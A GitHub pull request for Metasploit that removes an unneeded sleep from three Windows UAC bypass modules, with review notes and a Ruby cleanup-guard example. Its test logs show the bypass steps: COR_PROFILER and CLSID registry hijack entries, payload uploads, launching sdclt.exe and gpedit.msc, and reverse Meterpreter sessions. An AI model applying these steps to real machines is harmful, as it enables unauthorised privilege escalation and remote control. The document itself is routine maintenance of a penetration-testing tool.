
Remove unnecessary sleep in several bypassuac modules #17350

Merged
merged 2 commits into from
Dec 12, 2022

Conversation

smashery
Contributor

@smashery smashery commented Dec 9, 2022

This PR resolves a bug in several UAC bypass modules, which perform a sleep to await a shell before performing cleanup. The sleep is unnecessary, as the exploit driver already has the functionality to wait for a shell before performing cleanup.

The existing user experience feels frustrating ("what's it waiting for" or "Why hasn't it started my handler?"), which leads to a greater likelihood that the user will Ctrl+C out once the shell succeeds, preventing the cleanup and leaving more artifacts on disk.

Previous behaviour:

  • For a reverse shell:
    • The exploit starts
    • The sleep starts
    • The exploit succeeds almost immediately, and we get a shell
    • We continue waiting for 20 seconds
    • The cleanup occurs
    • We enter our shell
  • For a bind shell:
    • The exploit starts
    • The sleep starts
    • The exploit succeeds almost immediately, but we haven't started a handler yet
    • We continue waiting for 20 seconds
    • The cleanup occurs
    • The handler starts, and we gain a shell.

The new behaviour avoids the sleep, and leverages the existing cleanup method, so cleanup occurs as soon as we get the shell.

Verification

  • For each module:
    • Set VERBOSE to true (so you can see the cleanup)
    • Test success with a reverse payload - should immediately clean up and drop into the shell
    • Test success with a bind payload - should immediately clean up and drop into the shell
    • Test a failed exploit - should wait an appropriate amount of time, and clean up
    • Test an invalid version - should terminate immediately, and cleanup should do nothing

@smcintyre-r7 smcintyre-r7 self-assigned this Dec 12, 2022
@smcintyre-r7 smcintyre-r7 added module bug rn-fix release notes fix labels Dec 12, 2022
Contributor

@smcintyre-r7 smcintyre-r7 left a comment


Alright, I was able to test and verify all three modules are working as intended now. I am going to make a change as I push this up though. The logic for all three #cleanup methods starts with unless @something.empty?, which is fine for exploitation, but caused a NoMethodError when the module's check was used. I'm changing them all to if @something.present?, which will ensure that the value is set and not empty.

Exception output:

msf6 exploit(windows/local/bypassuac_sdclt) > recheck
[*] Reloading module...

[-] Msf::OptionValidateError The following options failed to validate: SESSION
[-] Check failed: The state could not be determined.
msf6 exploit(windows/local/bypassuac_sdclt) >

#present? examples:

[1] pry(#<Msf::Modules::Exploit__Windows__Local__Bypassuac_sdclt::MetasploitModule>)> nil.present?
=> false
[2] pry(#<Msf::Modules::Exploit__Windows__Local__Bypassuac_sdclt::MetasploitModule>)> [].present?
=> false
[3] pry(#<Msf::Modules::Exploit__Windows__Local__Bypassuac_sdclt::MetasploitModule>)> [nil].present?
=> true
[4] pry(#<Msf::Modules::Exploit__Windows__Local__Bypassuac_sdclt::MetasploitModule>)>

I'm also fixing the output of the messages regarding the manual cleanup. It's a little confusing because they have an opening ' but not a closing one. It makes you wonder if the ! is a literal.

Everything else looks good, thanks for this patch!
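The guard change described in the comment above, as an added example that is not Metasploit's own code: a hypothetical module skeleton where only check ran, so the instance variable tracking registry changes was never assigned. The unless ...empty? guard raises NoMethodError on nil, while present? treats nil and [] as not present but [nil] as present, matching the pry output. A minimal stand-in for ActiveSupport's blank?/present? is defined inline so the example runs without the gem.

```ruby
# Stand-in for ActiveSupport's Object#blank?/#present? (same semantics),
# so this example runs without activesupport installed.
class Object
  def blank?
    respond_to?(:empty?) ? !!empty? : !self
  end

  def present?
    !blank?
  end
end

# Hypothetical module skeleton: exploit records registry changes, cleanup
# undoes them. After a bare check, @reg_changes was never assigned (nil).
class FakeBypassModule
  attr_reader :log

  def initialize
    @log = []
  end

  def exploit
    # Constructed sample value, not a real key written by any module.
    @reg_changes = ['HKCU\Software\Classes\CLSID\{constructed-guid}\InprocServer32']
  end

  # Before the fix: nil.empty? raises NoMethodError when cleanup follows check.
  def cleanup_before
    unless @reg_changes.empty?
      @reg_changes.each { |k| @log << "Deleting #{k} key" }
    end
  end

  # After the fix: present? is false for nil and [], so cleanup is a no-op.
  def cleanup_after
    if @reg_changes.present?
      @reg_changes.each { |k| @log << "Deleting #{k} key" }
    end
  end
end

# Returns true when the named cleanup raises NoMethodError on a module
# that ran check only (exploit never called).
def raises_on_check?(method)
  FakeBypassModule.new.public_send(method)
  false
rescue NoMethodError
  true
end
```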

@smcintyre-r7 smcintyre-r7 merged commit d09aef7 into rapid7:master Dec 12, 2022
@smcintyre-r7
Contributor

Testing output
msf6 exploit(windows/local/bypassuac_dotnet_profiler) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/local/bypassuac_dotnet_profiler) > run

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\SMCINT~1\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] target_filepath = C:\Windows\System32\gpedit.msc
[*] Making Payload
[*] payload_pathname = C:\Users\SMCINT~1\AppData\Local\Temp\IMPHALxjUkl.dll
[*] UUID = b69e4605-8eac-497f-8d7f-d6e521bc0fb8
[*] Writing  to HKCU\Software\Classes\CLSID\{b69e4605-8eac-497f-8d7f-d6e521bc0fb8}\InprocServer32
[*] Writing COR_PROFILER to HKCU\Environment
[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
[*] Writing COR_PROFILER_PATH to HKCU\Environment
[*] Uploading Payload to C:\Users\SMCINT~1\AppData\Local\Temp\IMPHALxjUkl.dll
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\gpedit.msc
[!] This exploit requires manual cleanup of 'C:\Users\SMCINT~1\AppData\Local\Temp\IMPHALxjUkl.dll!
[*] Please wait for session and cleanup....
[*] Sending stage (200774 bytes) to 192.168.250.237
[*] Meterpreter session 5 opened (192.168.250.134:4444 -> 192.168.250.237:56463) at 2022-12-12 16:19:43 -0500
[*] Removing Registry Changes
[*] Deleting HKCU\Software\Classes\CLSID\{b69e4605-8eac-497f-8d7f-d6e521bc0fb8}\InprocServer32 key
[*] Deleting COR_PROFILER from HKCU\Environment key
[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key
[*] Deleting COR_PROFILER_PATH from HKCU\Environment key
[*] Registry Changes Removed

meterpreter >
msf6 exploit(windows/local/bypassuac_sdclt) > show options 

Module options (exploit/windows/local/bypassuac_sdclt):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
   SESSION       -1               yes       The session to run this module on


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     555              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/bypassuac_sdclt) > run
msf6 exploit(windows/local/bypassuac_sdclt) > run

[*] Started reverse TCP handler on 192.168.159.128:555 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Sending stage (200774 bytes) to 192.168.159.120
[!] This exploit requires manual cleanup of 'C:\Users\SMCINT~1\AppData\Local\Temp\SDwPazM.exe!
[*] Please wait for session and cleanup....
[*] Meterpreter session 6 opened (192.168.159.128:555 -> 192.168.159.120:49168) at 2022-12-12 16:20:26 -0500
[*] Registry Changes Removed

meterpreter > exit
[*] Shutting down Meterpreter...
s
[*] 192.168.159.120 - Meterpreter session 6 closed.  Reason: User exit
msf6 exploit(windows/local/bypassuac_sdclt) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/local/bypassuac_sdclt) > run

[*] Started reverse TCP handler on 192.168.159.128:555 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\SMCINT~1\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] exploit_file = C:\Windows\System32\sdclt.exe
[*] payload_pathname = C:\Users\SMCINT~1\AppData\Local\Temp\rjTDrf.exe
[*] Making Payload
[*] reg_command = C:\Windows\System32\cmd.exe /c start C:\Users\SMCINT~1\AppData\Local\Temp\rjTDrf.exe
[*] Uploading Payload to C:\Users\SMCINT~1\AppData\Local\Temp\rjTDrf.exe
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\sdclt.exe
[*] Sending stage (200774 bytes) to 192.168.159.120
[!] This exploit requires manual cleanup of 'C:\Users\SMCINT~1\AppData\Local\Temp\rjTDrf.exe!
[*] Please wait for session and cleanup....
[*] Meterpreter session 7 opened (192.168.159.128:555 -> 192.168.159.120:49169) at 2022-12-12 16:20:38 -0500
[*] Removing Registry Changes
[*] Registry Changes Removed

meterpreter >

@smcintyre-r7
Contributor

Release Notes

This updates three UAC bypass modules to remove a hard-coded delay in favor of using the module's built-in cleanup method. This results in the user having access to the interactive session without needing to wait.
